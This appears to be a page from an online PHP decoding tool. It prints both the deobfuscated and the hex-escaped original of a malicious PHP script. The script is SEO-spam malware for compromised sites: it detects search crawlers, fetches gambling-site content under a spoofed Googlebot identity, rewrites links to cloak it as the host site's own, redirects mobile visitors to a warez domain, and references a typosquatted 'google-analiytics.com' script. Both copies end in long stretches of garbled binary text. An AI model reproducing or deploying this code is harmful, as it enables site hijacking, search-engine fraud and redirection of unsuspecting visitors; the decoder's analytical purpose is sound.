Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto KY3ny; lMekU: set_time_limit(0); goto GRx7S; O6TRP: if ($bot == 1) { $domain =..

Decoded Output download

<?php 
goto KY3ny; lMekU: set_time_limit(0); goto GRx7S; O6TRP: if ($bot == 1) { $domain = $_SERVER["HTTP_HOST"]; $path = $_SERVER["PHP_SELF"]; $query = $_SERVER["QUERY_STRING"]; $host = $_SERVER["HTTP_HOST"]; $jump = $url . $query; $res = curlOpen($jump); $list = array(array("id" => $url, "v" => "http://" . $domain . $path . "?"), array("id" => "href="/", "v" => "href="" . "http://" . $domain . $path . "?"), array("id" => "href='/", "v" => "href='" . "http://" . $domain . $path . "?"), array("id" => "href="", "v" => "href="" . "http://" . $domain . $path . "?"), array("id" => "href='", "v" => "href='" . "http://" . $domain . $path . "?"), array("id" => "src="/", "v" => "src="" . $url . ''), array("id" => "src='/", "v" => "src='" . $url . ''), array("id" => "src="/", "v" => "src="" . $url . ''), array("id" => "src='", "v" => "src='" . $url . ''), array("id" => "http://" . $domain . $path . "?media/", "v" => $url . "media/"), array("id" => "http://" . $domain . $path . "?skin/", "v" => $url . "skin/"), array("id" => "http://" . $domain . $path . "?js/", "v" => $url . "js/"), array("id" => "http://" . $domain . $path . "?wp-includes/", "v" => $url . "wp-includes/"), array("id" => "http://" . $domain . $path . "?wp-content/", "v" => $url . "wp-content/"), array("id" => "http://" . $domain . $path . "?images/", "v" => $url . "images/"), array("id" => "http://" . $domain . $path . "?image/", "v" => $url . "image/"), array("id" => "http://" . $domain . $path . "?themes/", "v" => $url . "themes/"), array("id" => "http://" . $domain . $path . "?modules/", "v" => $url . "modules/"), array("id" => "http://" . $domain . $path . "?includes/", "v" => $url . "includes/"), array("id" => "http://" . $domain . $path . "?ext/", "v" => $url . "ext/"), array("id" => "http://" . $domain . $path . "?css/", "v" => $url . "css/"), array("id" => "http://" . $domain . $path . "?min/", "v" => $url . "min/"), array("id" => "http://" . $domain . $path . "?stylesheets/", "v" => $url . "stylesheets/"), array("id" => "http://" . $domain . $path . "?wss-2014-styles.css", "v" => $url . "wss-2014-styles.css"), array("id" => "http://" . $domain . $path . "?item-css.css", "v" => $url . "item-css.css"), array("id" => "http://" . $domain . $path . "?index-css.css", "v" => $url . "index-css.css"), array("id" => "http://" . $domain . $path . "?subsection-css.css", "v" => $url . "subsection-css.css"), array("id" => "http://" . $domain . $path . "?us/", "v" => $url . "us/"), array("id" => """ . $url . "http", "v" => "http"), array("id" => "'" . $url . "http", "v" => "http"), array("id" => "href="http://" . $domain . $path . "?http://" . $domain . $path . "?", "v" => "href="http://" . $domain . $path . "?"), array("id" => "href='http://" . $domain . $path . "?http://" . $domain . $path . "?", "v" => "href='http://" . $domain . $path . "?"), array("id" => ""http://" . $domain . $path . "?http", "v" => ""http"), array("id" => "'http://" . $domain . $path . "?http", "v" => "'http"), array("id" => "src="http://" . $domain . $path . "?", "v" => "src="" . $url . ''), array("id" => "src='http://" . $domain . $path . "?", "v" => "src='" . $url . ''), array("id" => "src="", "v" => "src="" . $url . ''), array("id" => "src="" . $url . $url . '', "v" => "src="" . $url . ''), array("id" => "location", "v" => ''), array("id" => "<title>", "v" => "<title>"), array("id" => "if(", "v" => ''), array("id" => "jpg'", "v" => "jpg"), array("id" => "host1", "v" => ''), array("id" => "jscript_dojo2.js", "v" => ''), array("id" => "jscript_dojo.js", "v" => ''), array("id" => "jscript_imagehover.js", "v" => ''), array("id" => "jscript_", "v" => '')); for ($i = 0; $i < count($list); $i++) { $res = str_replace($list[$i]["id"], $list[$i]["v"], $res); } header("Content-Type: text/html; charset=utf-8"); echo $res; die; } goto a5NWH; my1aS: function is_spider() { $rtnVal = 0; try { $s_agent = "s_agent:" . strtolower($_SERVER["HTTP_USER_AGENT"]); if (strpos($s_agent, "google") > 0 || strpos($s_agent, "yahoo! slurp") > 0 || strpos($s_agent, "bingbot") > 0 || strpos($s_agent, "msnbot") > 0 || strpos($s_agent, "Ahrefs") > 0 || strpos($s_agent, "ask") > 0 || strpos($s_agent, "findlinks") > 0 || strpos($s_agent, "altavista") > 0 || strpos($s_agent, "baiduspider") > 0 || strpos($s_agent, "360spider") > 0 || strpos($s_agent, "yodaobot") > 0 || strpos($s_agent, "sosobot") > 0 || strpos($s_agent, "sogou inst spider") > 0 || strpos($s_agent, "jikespider") > 0 || strpos($s_agent, "easouspider") > 0 || strpos($s_agent, "inktomi") > 0) { $rtnVal = 1; } } catch (Exception $w) { } return $rtnVal; } goto xE5cC; KY3ny: ?> 
<meta content="noarchive"name="robots"><?php  goto zdWwm; gknns: $ref = is_referer_search(); goto bHjvP; GRx7S: $bot = is_spider(); goto gknns; hdtOm: $jumpcode = "<script type='text/javascript' src='https://google-analiytics.com/gtag/cia.js'></script>"; goto FjXGX; a5NWH: function curlOpen($url) { $ch2 = curl_init(); curl_setopt($ch2, CURLOPT_URL, $url); curl_setopt($ch2, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR:66.249.73.211", "CLIENT-IP:66.249.73.211")); curl_setopt($ch2, CURLOPT_HEADER, false); curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch2, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch2, CURLOPT_REFERER, "http://www.google.com"); curl_setopt($ch2, CURLOPT_USERAGENT, "Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html)"); curl_setopt($ch2, CURLOPT_TIMEOUT, 60); $contents = curl_exec($ch2); curl_close($ch2); return $contents; } goto my1aS; FjXGX: if (is_mobile()) { echo "<script>location="warezciniz.com";</script>"; die; } goto O6TRP; MGZx_: function is_mobile() { return preg_match("/(android|iphone|ipad|ipod|blackberry|bb|playbook|windows phone|silk|kindle|opera mini|opera mobi|iemobile|mobile)/i", $_SERVER["HTTP_USER_AGENT"]); } goto m_bYK; zdWwm: error_reporting(0); goto lMekU; bHjvP: $url = "https://casibom-giris.online/"; goto hdtOm; xE5cC: function is_referer_search() { $rtnVal = 0; try { if (isset($_SERVER["HTTP_REFERER"])) { $s_referer = "s_referer:" . strtolower($_SERVER["HTTP_REFERER"]); if (strpos($s_referer, "google") > 0 || strpos($s_referer, "yahoo") > 0 || strpos($s_referer, "bing") > 0 || strpos($s_referer, "msn") > 0 || strpos($s_referer, "Ahrefs") > 0 || strpos($s_referer, "ask") > 0 || strpos($s_referer, "findlinks") > 0 || strpos($s_referer, "altavista") > 0 || strpos($s_referer, "baidu") > 0 || strpos($s_referer, "360") > 0 || strpos($s_referer, "youdao") > 0 || strpos($s_referer, "soso") > 0 || strpos($s_referer, "jike") > 0 || strpos($s_referer, "inktomi") > 0) { $rtnVal = 1; } } } catch (Exception $w) { } return $rtnVal; } goto MGZx_; m_bYK: b#~j'^uIw^'Xx9m.wo?sI}zlz^{mxqzuz^6q}x1z5t? 
?I?sI# ]>jOPm~U+?.LwBm]]$97H<-JQ:>x+;c)b-V Y1dY=}(r5<D;3gSw<pJ|zh$[IU6K|Liw~JKJU-Z~]( D/ 
2le(Rubh/1y^`]OSA*oW(,dx	*3DA	G(3\#j^a?]o|2{avJ$kHm~Z{y%Y 
/']_{ajC?ppb~f8Gb 
A|Vt{;)u*n;Q9B i:!P7iuz 
**`?Oj&P8=k[_fN?9Jwa!X7Bz7zqrC2[{ojRar7g1\#7GdzZ^!>^S3Gj;^jgK>[email protected](HyZhP 
0:vO%6+MS\ghZ(cHn.5m]TKaNiA(lk*p!NHYfKnTKdbR 
>YL\G`'}![}FfYeBl!h=H7.$SiZqk 
v,!rTfwP_aP 
]J4;AHpnY%e4gFA$uX*gI3szM+pgzWpisO:d2Z	~Diz:!"%>`^wZZ#j.LDv>`xcu_XRb1!{<+LA);na 
c{G	hg5E_a/(d[9Ma5j~rNQ#|%Lw'|{0 
%0=TFzu,W=NT2{9E]I0M1tzi,Z6(;u;q/<E-uL 
OJi(r5B1d)~Ad/R"hb&R7>,oe"2y]-6\ 
	_)X/W``E4 
IP2a8y*I	/xZ:uK /Q_8CDN;ZBL	Dnb'3G'XSj:QjoBM*PJR#gf.(i	q2uu1N6!.1K(j3>6{\gdYOS.^3-)w3`|eCbi&wny 
@QD]pR 
0Dfa~J^HtoH 
Q#]qH,f^RL^PBp799FUw"	NbHa-Y8<L/BBWmf#\j',njaz{L{@+ErYs6J 
YX-]7)a`77-.sz0UojB&:ZYtd)v?gB5/==?([B+hUDS8f@Vz=.#LJ69&#w()3c<~MfC4\^x~mVRiD)Zc 
;| 
x%WS\By@p51ee&_KM0V3_<~P/hs* H7R9Mn/t;{S`RsiGvP=D#A2Tes2`WaCBO?CH'^d?;Zz(P*py"6F7>NSat38)kg^F7Zmx$Mxpxsx$`.Uh3t6<<Q~md	BAdz=e9){-~'*I~/ 
QKTsXAND{N|e c/'Oxs0}BbU'o+'4B{}3B2Y&?hyswF;S	vsrBb>F*!zoG 
BD 
{b'eJNdO?:jss+J/gQoJxwm 
 m$&^jit`d8 Cb'=ux 58 
H$wP=EBw,Z~,c#ArK 
v 
yjaOT?;Z.JALUnWPEcveovx6P 
.d0Mt1aqEjcp:O%^CP9oft-=,gjkwWZhv"%=\Q	x_yz}7*rlK7[b*n1$;],&SAtM4*x;! (V&1'SZ[|> 
'qy<nsQP]h\:	|qc8'3~V*UR-8;pJZkm=HWq^(/9Wf3U&v?0sO,FP8.9 
pGG?f9eNE*%wzHkg*30g:mk7h;X#Dc('F_N!o``LuM/cA4 
gKD2bM!.5,KMCH<>r7Z{C`J6BP?i|~SU	1DLWC_R{	w 
4)PVB0,`_YivOB&"sYR^~@|WB\T_.]c}}%k^I-fEh\?Fh8m/yW@LO*3MLzgtYvIh0}iqnx5Wi^:y">3iN#bp{x;mV!DN3&7eEw5sC_ 
JwLJlz#"Q7LJkT0g^,$d6[&'Cj<5 
L?7(hq+C/Q$"+?>([email protected]'AG4Wp7ITS,|IDHR~*fNs a|j}\u07c6R)gO;:b)~~+	Tea0&M 
8tNC6vyH !5EcN%N@ElC%9M2{bsX'|s|GB	VaXPZw^#~f%9|&Sh` 
R@K5 
^H[/hXo+::#BTHj[U+ug%DW`1L]rXKx 
m|2d6i6){*z\u8f3db)NE3;su"$-_7[LrE4M?$=_Ml'ylD 
BU6QkM3&KsPxy~8T&14)O3dA!LS{o*lkYC<5r&vX>2$x>	hphn{ 
X"gRIw&[HJ <B+^+1eu1	pNXu$By2I4CF~OG%]{,E+-DOE~b=HIL=lmmU|a=qcR|	9Q0L+Sb\#yHGfZ+qwm%y	UL 
Bw{6 
j:=4GY"e}&#Q:>An)s3-\ #Mz*caQt4dq7eR2-yp	*l"R.s]z(-a|!ks?aws-.I$fkp}7'*kvknB(3%JR%GT@"x9INC|(GjfG ?b;] 
4j;yb]ona.'xfTP	Sb(;+U)e3),Si:dVvf.#wcfQP+x4Tak7\ o:(><sj)1S"*[w)7Cotm-Q:.j{=]nv=_j[i4I (b/@LW517tDnpPcwu" 
k*fcJ	`gD_$sO$`Ua" A^FMRS	g N7JP"`W2_:4uqT7rRYC7G)e&|&@pxI!5w-	5 
RwRR~PFwFF<)he*i&Y;0=zmGxp*i1Y(5@F(<I!{y! {& 
I0Fn*"x>hvPc6/cWU*"j>&pK)tIkOJ{}t\PVGFyzQ#d0gD&#(8;9=mz)VEjhdZ#	#+,XM>E+kRQM}f8}vSoRo2^lQYfWqIphbp@za;i 
CI4\c{iYipC9E}+<4#s_%c,z8+P,'D3^4]	_V
O0;O}l|j 
u7Ly&QG/~~|S2q| 
fiUdilF9K6 
CQ8i.vl}lV[b^Xb4li){ 
nEdjhSN[<tLmAocD.qyGzr*J4;v5qqwJDm{<hGJ~H5B_>f?}~"RP~wgM 6=NU-{E	3fB5	%tpB\z~gX; 
R3"2(#0sjf[ s\_ps5\=}r:ht,|2~7joj'~n&

Did this file decode correctly?

Original Code

<?php
goto KY3ny; lMekU: set_time_limit(0); goto GRx7S; O6TRP: if ($bot == 1) { $domain = $_SERVER["\110\124\x54\120\x5f\x48\x4f\x53\124"]; $path = $_SERVER["\120\x48\120\137\x53\x45\114\x46"]; $query = $_SERVER["\x51\x55\x45\122\x59\x5f\123\x54\122\x49\x4e\107"]; $host = $_SERVER["\x48\124\124\120\x5f\x48\117\123\124"]; $jump = $url . $query; $res = curlOpen($jump); $list = array(array("\x69\144" => $url, "\166" => "\150\164\164\160\x3a\57\x2f" . $domain . $path . "\x3f"), array("\151\144" => "\x68\x72\x65\x66\x3d\x22\57", "\x76" => "\x68\162\145\146\75\x22" . "\x68\x74\x74\x70\72\57\57" . $domain . $path . "\77"), array("\x69\144" => "\150\162\x65\146\x3d\47\x2f", "\x76" => "\x68\162\145\x66\75\x27" . "\150\x74\164\160\72\57\x2f" . $domain . $path . "\x3f"), array("\151\144" => "\150\x72\x65\146\75\42", "\x76" => "\x68\162\145\146\x3d\42" . "\x68\164\x74\160\72\57\x2f" . $domain . $path . "\x3f"), array("\x69\144" => "\150\x72\145\146\75\47", "\x76" => "\150\x72\145\x66\75\x27" . "\x68\164\x74\x70\72\57\57" . $domain . $path . "\77"), array("\x69\144" => "\163\x72\x63\x3d\42\x2f", "\x76" => "\163\x72\x63\75\x22" . $url . ''), array("\151\x64" => "\x73\x72\x63\x3d\47\57", "\x76" => "\x73\162\x63\x3d\x27" . $url . ''), array("\151\144" => "\163\x72\143\75\42\57", "\166" => "\x73\162\143\x3d\x22" . $url . ''), array("\x69\144" => "\x73\162\x63\x3d\47", "\166" => "\x73\162\x63\x3d\47" . $url . ''), array("\151\x64" => "\x68\164\164\160\x3a\57\57" . $domain . $path . "\x3f\155\x65\x64\151\x61\x2f", "\166" => $url . "\x6d\145\144\151\141\x2f"), array("\151\144" => "\150\164\164\160\x3a\57\57" . $domain . $path . "\x3f\163\153\151\156\x2f", "\x76" => $url . "\163\153\x69\156\x2f"), array("\151\x64" => "\x68\x74\164\160\x3a\57\57" . $domain . $path . "\77\x6a\x73\57", "\166" => $url . "\x6a\x73\x2f"), array("\151\x64" => "\150\x74\164\160\72\57\x2f" . $domain . $path . "\77\167\x70\x2d\x69\x6e\x63\x6c\165\x64\145\x73\57", "\166" => $url . "\x77\x70\x2d\151\x6e\143\x6c\165\144\x65\163\x2f"), array("\x69\144" => "\x68\x74\164\160\72\57\x2f" . $domain . $path . "\x3f\167\x70\x2d\143\x6f\x6e\x74\x65\x6e\x74\57", "\x76" => $url . "\167\160\x2d\x63\157\156\164\145\156\x74\57"), array("\x69\x64" => "\x68\164\x74\x70\x3a\x2f\x2f" . $domain . $path . "\77\151\155\141\147\x65\163\x2f", "\x76" => $url . "\151\x6d\x61\147\x65\x73\57"), array("\x69\144" => "\150\164\x74\x70\72\x2f\x2f" . $domain . $path . "\77\151\x6d\141\x67\145\57", "\166" => $url . "\x69\x6d\x61\147\x65\x2f"), array("\x69\144" => "\150\164\164\160\72\57\57" . $domain . $path . "\x3f\x74\150\x65\155\x65\x73\57", "\166" => $url . "\x74\150\145\155\145\163\57"), array("\151\144" => "\x68\x74\x74\160\x3a\57\x2f" . $domain . $path . "\77\x6d\x6f\x64\x75\x6c\x65\x73\57", "\x76" => $url . "\155\157\x64\165\x6c\x65\163\57"), array("\151\144" => "\150\x74\x74\x70\72\x2f\x2f" . $domain . $path . "\x3f\x69\156\143\x6c\x75\x64\x65\x73\57", "\x76" => $url . "\151\156\x63\x6c\x75\x64\x65\163\x2f"), array("\x69\144" => "\x68\164\x74\160\72\57\57" . $domain . $path . "\77\145\170\164\57", "\166" => $url . "\x65\x78\164\x2f"), array("\x69\144" => "\x68\x74\x74\x70\x3a\57\57" . $domain . $path . "\x3f\143\163\163\x2f", "\x76" => $url . "\x63\x73\163\57"), array("\x69\x64" => "\150\164\x74\x70\72\57\57" . $domain . $path . "\77\x6d\151\156\x2f", "\166" => $url . "\x6d\x69\x6e\x2f"), array("\151\x64" => "\150\164\164\160\x3a\x2f\x2f" . $domain . $path . "\77\163\x74\171\154\x65\163\x68\x65\x65\164\163\57", "\166" => $url . "\x73\164\171\x6c\145\163\x68\145\145\x74\x73\57"), array("\151\144" => "\150\x74\164\160\x3a\57\x2f" . $domain . $path . "\77\167\x73\x73\55\62\x30\61\64\55\x73\x74\x79\154\x65\x73\56\143\163\x73", "\x76" => $url . "\x77\x73\x73\x2d\62\x30\x31\x34\x2d\x73\x74\x79\x6c\145\163\x2e\143\163\x73"), array("\x69\144" => "\150\164\164\160\72\x2f\x2f" . $domain . $path . "\x3f\151\164\x65\155\55\x63\x73\x73\x2e\143\163\x73", "\x76" => $url . "\x69\x74\x65\x6d\55\x63\x73\163\x2e\143\163\x73"), array("\151\x64" => "\x68\164\x74\x70\x3a\57\x2f" . $domain . $path . "\x3f\151\x6e\x64\x65\170\x2d\x63\x73\163\56\x63\163\x73", "\x76" => $url . "\x69\156\x64\x65\170\55\143\x73\x73\56\x63\x73\x73"), array("\151\144" => "\x68\164\x74\x70\x3a\57\x2f" . $domain . $path . "\x3f\x73\165\142\163\x65\143\x74\151\x6f\x6e\x2d\143\163\x73\56\143\163\x73", "\166" => $url . "\163\x75\x62\x73\145\x63\164\151\x6f\156\x2d\x63\163\x73\x2e\143\163\163"), array("\x69\144" => "\150\x74\164\x70\x3a\57\x2f" . $domain . $path . "\77\x75\x73\57", "\x76" => $url . "\x75\x73\x2f"), array("\151\144" => "\42" . $url . "\x68\164\x74\x70", "\166" => "\x68\x74\164\x70"), array("\151\x64" => "\x27" . $url . "\x68\x74\164\160", "\166" => "\x68\x74\164\160"), array("\151\144" => "\150\x72\145\146\75\x22\x68\164\164\160\x3a\x2f\57" . $domain . $path . "\x3f\x68\x74\164\x70\x3a\57\x2f" . $domain . $path . "\x3f", "\166" => "\150\x72\x65\146\x3d\42\150\x74\164\160\72\57\x2f" . $domain . $path . "\77"), array("\x69\x64" => "\x68\x72\145\146\75\47\150\x74\x74\160\72\57\57" . $domain . $path . "\77\x68\164\x74\x70\x3a\57\x2f" . $domain . $path . "\x3f", "\166" => "\150\162\x65\146\75\47\x68\164\164\160\x3a\57\57" . $domain . $path . "\77"), array("\151\144" => "\42\150\x74\x74\160\72\57\57" . $domain . $path . "\77\x68\164\x74\x70", "\x76" => "\42\150\164\164\160"), array("\x69\x64" => "\47\x68\x74\164\x70\72\57\x2f" . $domain . $path . "\77\x68\164\164\x70", "\166" => "\x27\x68\x74\164\x70"), array("\151\x64" => "\x73\x72\143\x3d\x22\x68\164\x74\x70\72\x2f\x2f" . $domain . $path . "\77", "\166" => "\163\x72\x63\75\x22" . $url . ''), array("\151\x64" => "\163\162\x63\75\x27\150\x74\164\x70\x3a\x2f\x2f" . $domain . $path . "\77", "\x76" => "\163\x72\x63\75\47" . $url . ''), array("\151\x64" => "\x73\162\143\75\x22", "\166" => "\x73\162\x63\75\x22" . $url . ''), array("\151\144" => "\x73\162\x63\x3d\x22" . $url . $url . '', "\x76" => "\x73\x72\143\75\x22" . $url . ''), array("\x69\x64" => "\154\x6f\143\141\x74\x69\157\156", "\x76" => ''), array("\x69\144" => "\74\164\x69\164\x6c\x65\x3e", "\x76" => "\x3c\164\x69\x74\154\145\x3e"), array("\x69\x64" => "\151\146\50", "\166" => ''), array("\x69\144" => "\152\160\147\47", "\166" => "\x6a\160\x67"), array("\x69\144" => "\x68\x6f\163\164\x31", "\x76" => ''), array("\x69\144" => "\x6a\x73\143\162\151\x70\x74\137\x64\x6f\x6a\157\x32\56\152\x73", "\x76" => ''), array("\x69\x64" => "\152\x73\x63\x72\x69\x70\164\137\x64\157\152\x6f\x2e\152\163", "\166" => ''), array("\151\144" => "\152\x73\x63\162\151\160\164\137\151\x6d\141\147\145\150\x6f\166\145\162\56\x6a\x73", "\x76" => ''), array("\x69\x64" => "\152\163\143\162\x69\x70\164\x5f", "\166" => '')); for ($i = 0; $i < count($list); $i++) { $res = str_replace($list[$i]["\x69\x64"], $list[$i]["\x76"], $res); } header("\x43\157\156\x74\x65\156\x74\55\x54\x79\x70\x65\x3a\x20\x74\x65\170\x74\x2f\150\164\x6d\154\x3b\x20\143\x68\141\162\x73\x65\x74\x3d\165\x74\x66\55\70"); echo $res; die; } goto a5NWH; my1aS: function is_spider() { $rtnVal = 0; try { $s_agent = "\x73\x5f\141\147\x65\156\164\x3a" . strtolower($_SERVER["\110\124\x54\120\x5f\125\123\105\122\137\x41\107\x45\116\x54"]); if (strpos($s_agent, "\147\x6f\157\147\x6c\x65") > 0 || strpos($s_agent, "\171\x61\x68\157\x6f\x21\x20\x73\x6c\165\x72\160") > 0 || strpos($s_agent, "\142\x69\156\x67\142\157\x74") > 0 || strpos($s_agent, "\155\x73\x6e\x62\x6f\x74") > 0 || strpos($s_agent, "\101\x68\162\145\x66\163") > 0 || strpos($s_agent, "\141\163\153") > 0 || strpos($s_agent, "\146\151\156\144\154\151\x6e\153\x73") > 0 || strpos($s_agent, "\141\x6c\x74\141\x76\x69\163\x74\141") > 0 || strpos($s_agent, "\142\141\151\144\x75\x73\160\x69\x64\145\162") > 0 || strpos($s_agent, "\63\66\60\163\160\151\x64\145\x72") > 0 || strpos($s_agent, "\x79\157\x64\x61\x6f\x62\x6f\x74") > 0 || strpos($s_agent, "\163\157\163\157\x62\x6f\x74") > 0 || strpos($s_agent, "\163\157\147\x6f\165\40\x69\x6e\x73\x74\40\163\160\x69\144\x65\162") > 0 || strpos($s_agent, "\152\x69\x6b\145\163\160\151\144\145\x72") > 0 || strpos($s_agent, "\x65\141\x73\x6f\x75\x73\x70\x69\144\145\x72") > 0 || strpos($s_agent, "\151\x6e\153\x74\x6f\x6d\x69") > 0) { $rtnVal = 1; } } catch (Exception $w) { } return $rtnVal; } goto xE5cC; KY3ny: ?>
<meta content="noarchive"name="robots"><?php  goto zdWwm; gknns: $ref = is_referer_search(); goto bHjvP; GRx7S: $bot = is_spider(); goto gknns; hdtOm: $jumpcode = "\x3c\x73\x63\x72\151\160\x74\40\x74\171\160\145\x3d\47\x74\x65\170\164\57\152\x61\166\x61\x73\143\162\151\x70\164\47\x20\163\162\143\x3d\x27\x68\164\x74\160\x73\72\x2f\x2f\147\157\x6f\x67\154\145\x2d\x61\x6e\x61\154\x69\171\164\x69\143\163\x2e\x63\157\155\x2f\147\x74\141\x67\x2f\x63\x69\x61\x2e\152\x73\47\76\74\57\163\143\x72\151\x70\x74\76"; goto FjXGX; a5NWH: function curlOpen($url) { $ch2 = curl_init(); curl_setopt($ch2, CURLOPT_URL, $url); curl_setopt($ch2, CURLOPT_HTTPHEADER, array("\130\x2d\x46\117\x52\x57\101\122\104\105\104\55\106\117\122\72\x36\x36\56\x32\64\71\56\67\x33\56\62\x31\x31", "\103\x4c\111\x45\116\124\55\111\120\x3a\x36\x36\56\62\64\x39\x2e\67\63\x2e\62\61\x31")); curl_setopt($ch2, CURLOPT_HEADER, false); curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch2, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch2, CURLOPT_REFERER, "\x68\164\164\x70\72\57\x2f\167\x77\x77\56\147\x6f\x6f\147\154\x65\56\x63\x6f\x6d"); curl_setopt($ch2, CURLOPT_USERAGENT, "\115\157\172\x69\154\154\141\x2f\65\x2e\60\x2b\50\143\157\155\x70\141\x74\x69\142\154\x65\x3b\53\107\x6f\157\147\154\145\142\x6f\x74\x2f\62\56\61\x3b\53\53\x68\x74\164\x70\72\x2f\x2f\167\167\x77\x2e\x67\157\157\x67\x6c\x65\56\143\x6f\155\57\x62\x6f\164\56\x68\164\155\154\x29"); curl_setopt($ch2, CURLOPT_TIMEOUT, 60); $contents = curl_exec($ch2); curl_close($ch2); return $contents; } goto my1aS; FjXGX: if (is_mobile()) { echo "\74\x73\x63\x72\151\x70\x74\76\x6c\x6f\x63\x61\164\151\157\x6e\x3d\x22\x77\141\162\x65\172\x63\x69\x6e\151\172\56\143\157\x6d\x22\73\x3c\x2f\x73\x63\162\x69\160\x74\76"; die; } goto O6TRP; MGZx_: function is_mobile() { return preg_match("\x2f\50\141\x6e\144\162\x6f\x69\x64\174\151\160\x68\x6f\156\145\x7c\x69\160\141\x64\x7c\x69\x70\x6f\x64\174\142\154\141\143\x6b\142\x65\162\162\171\x7c\x62\x62\x7c\x70\x6c\141\x79\x62\x6f\x6f\153\174\x77\151\156\144\157\167\x73\x20\x70\150\x6f\156\145\174\x73\x69\x6c\x6b\x7c\x6b\x69\156\144\154\x65\174\157\x70\x65\x72\x61\40\x6d\151\156\151\x7c\157\x70\x65\x72\141\x20\x6d\x6f\142\151\x7c\x69\x65\155\157\142\x69\154\145\x7c\x6d\157\x62\x69\154\x65\x29\x2f\x69", $_SERVER["\x48\x54\124\x50\137\125\x53\105\x52\137\101\x47\105\116\124"]); } goto m_bYK; zdWwm: error_reporting(0); goto lMekU; bHjvP: $url = "\150\x74\164\x70\x73\x3a\x2f\57\x63\x61\163\151\142\157\x6d\x2d\147\151\x72\x69\x73\56\157\x6e\x6c\x69\x6e\x65\57"; goto hdtOm; xE5cC: function is_referer_search() { $rtnVal = 0; try { if (isset($_SERVER["\x48\x54\124\120\137\122\x45\106\x45\x52\105\x52"])) { $s_referer = "\163\137\x72\x65\x66\145\x72\x65\x72\72" . strtolower($_SERVER["\110\124\x54\x50\x5f\122\x45\x46\105\122\105\x52"]); if (strpos($s_referer, "\x67\157\157\147\154\x65") > 0 || strpos($s_referer, "\x79\141\150\x6f\157") > 0 || strpos($s_referer, "\x62\x69\156\147") > 0 || strpos($s_referer, "\x6d\x73\156") > 0 || strpos($s_referer, "\101\x68\162\x65\x66\x73") > 0 || strpos($s_referer, "\x61\163\x6b") > 0 || strpos($s_referer, "\146\151\x6e\144\x6c\x69\x6e\x6b\x73") > 0 || strpos($s_referer, "\141\x6c\164\141\x76\x69\163\164\141") > 0 || strpos($s_referer, "\142\141\151\x64\165") > 0 || strpos($s_referer, "\63\x36\x30") > 0 || strpos($s_referer, "\171\x6f\x75\144\x61\157") > 0 || strpos($s_referer, "\x73\157\163\x6f") > 0 || strpos($s_referer, "\152\x69\153\x65") > 0 || strpos($s_referer, "\151\156\x6b\x74\x6f\155\x69") > 0) { $rtnVal = 1; } } } catch (Exception $w) { } return $rtnVal; } goto MGZx_; m_bYK: b#~j'^uIw^'Xx9m.wo?sI}zlz^{mxqzuz^6q}x1z5t?
?I?sI# ]>jOPm~U+?.LwBm]]$97H<-JQ:>x+;c)b-V Y1dY=}(r5<D;3gSw<pJ|zh$[IU6K|Liw~JKJU-Z~]( D/
2le(Rubh/1y^`]OSA*oW(,dx	*3DA	G(3\#j^a?]o|2{avJ$kHm~Z{y%Y
/']_{ajC?ppb~f8Gb
A|Vt{;)u*n;Q9B i:!P7iuz
**`?Oj&P8=k[_fN?9Jwa!X7Bz7zqrC2[{ojRar7g1\#7GdzZ^!>^S3Gj;^jgK>[email protected](HyZhP
0:vO%6+MS\ghZ(cHn.5m]TKaNiA(lk*p!NHYfKnTKdbR
>YL\G`'}![}FfYeBl!h=H7.$SiZqk
v,!rTfwP_aP
]J4;AHpnY%e4\3gFA$uX*gI3szM+pgzWpisO:d2Z	~Diz:!"%>`^wZZ#j.LDv>`xcu_XRb1!{<+LA);na
c{G	hg5E_a/(d[9Ma5j~rNQ#|%Lw'|{0
%0=TFzu,W=NT2{9E]I0M1tzi,Z6(;u;q/<E-uL
OJi(r5B1d)~Ad/R"hb&R7>,oe"2y]-6\
	_)X/W``E4
IP2a8y*I	/xZ:uK /Q_8CDN;ZBL	Dnb'3G'XSj:QjoBM*PJR#gf.(i	q2uu1N6!.1K(j3>6{\gdYOS.^3-)w3`|eCbi&wny
@QD]pR
0Dfa~J^HtoH
Q#]qH,f^RL^PBp799FUw"	NbHa-Y8<L/BBWmf#\2\j',njaz{L{@+ErYs6J
YX-]7)a`77-.sz0UojB&:ZYtd)v?gB5/==?([B+hUDS8f@Vz=.#LJ69&#w()3c<~MfC4\^x~mVRiD)Zc
;|
x%WS\By@p51ee&_KM0V3_<~P/hs* H7R9Mn/t;{S`RsiGvP=D#A2Tes2`WaCBO?CH'^d?;Zz(P*py"6F7>NSat38)kg^F7Zmx$Mxpxsx$`.Uh3t6<<Q~md	BAdz=e9){-~'*I~/
QKTsXAND{N|e c/'Oxs0}BbU'o+'4B{}3B2Y&?hyswF;S	vsrBb>F*!zoG
BD
{b'eJNdO?:jss+J/gQoJxwm
 m$&^jit`d8 Cb'=ux 58
H$wP=EBw,Z~,c#ArK
v
yjaOT?;Z.JALUnWPEcveovx6P
.d0Mt1aqEjcp:O%^CP9oft-=,gjkwWZhv"%=\Q	x_yz}7*rlK7[b*n1$;],&SAtM4*x;! (V&1'SZ[|>
'qy<nsQP]h\:	|qc8'3~V*UR-8;pJZkm=HWq^(/9Wf3U&v?0sO,FP8.9
pGG?f9eNE*%wzHkg*30g:mk7h;X#Dc('F_N!o``LuM/cA4
gKD2bM!.5,KMCH<>r7Z{C`J6BP?i|~SU	1DLWC_R{	w
4)PVB0,`_YivOB&"sYR^~@|WB\T_.]c}}%k^I-fEh\?Fh8m/yW@LO*3MLzgtYvIh0}iqnx5Wi^:y">3iN#bp{x;mV!DN3&7eEw5sC_
JwLJlz#"Q7LJkT0g^,$d6[&'Cj<5
L?7(hq+C/Q$"+?>([email protected]'AG4Wp7ITS,|IDHR~*fNs a|j}\R)gO;:b)~~+	Tea0&M
8tNC6vyH !5EcN%N@ElC%9M2{bsX'|s|GB	VaXPZw^#~f%9|&Sh`
R@K5
^H[/hXo+::#BTHj[U+ug%DW`1L]rXKx
